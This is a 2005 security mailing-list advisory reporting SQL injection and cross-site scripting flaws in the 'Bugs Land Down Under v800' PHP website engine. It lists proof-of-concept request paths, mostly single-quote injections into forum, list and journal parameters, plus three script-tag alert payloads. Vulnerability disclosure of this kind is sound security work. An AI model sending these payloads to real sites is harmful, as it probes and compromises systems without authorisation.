[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20050820094301.23980.qmail@securityfocus.com>
Date: 20 Aug 2005 09:43:01 -0000
From: bl2k@...bgard.org
To: bugtraq@...urityfocus.com
Subject: Bugs Land Down Under v800
Bugs Land Down Under v800
PHP/MySQL Website engine
Copyright Neocrome - http://www.neocrome.net
---------------------------------------------
Sql Injection and Cross Site Scripting Problem
examlple :
/ldu/forums.php?m=topics&s='
/ldu/list.php?c=articles&s=title&w=asc&o='&p=1
/ldu/list.php?c=articles&s=title&w='&o=1&p=1
/ldu/list.php?c=articles&s='&w=asc&o=1&p=1
/ldu/journal.php?m='&s=username&w=asc
/ldu/journal.php?m='&p=1
/ldu/journal.php?m='
/ldu/forums.php?filter=forums%2Ephp%3Fc%3Dskin&x='
/ldu/forums.php?m=topics&q=3&n='
/ldu/list.php?c=articles&s=title&w=asc&o=1&p='
/ldu/forums.php?m='&q=3&n=last
/ldu/links.php?c=links&s=title&w='
---------------------------------------------
/ldu/index.php?c='><script>alert('test');</script>
/ldu/index.php?m='><script>alert('test');</script>
/ldu/journal.php?m=home&s=username&w='><script>alert('test');</script>
bl2k & SmallMouse
Greetz --elite-- , hurgy , Littlehackers , Cisco
www.shabgard.org
Powered by blists - more mailing lists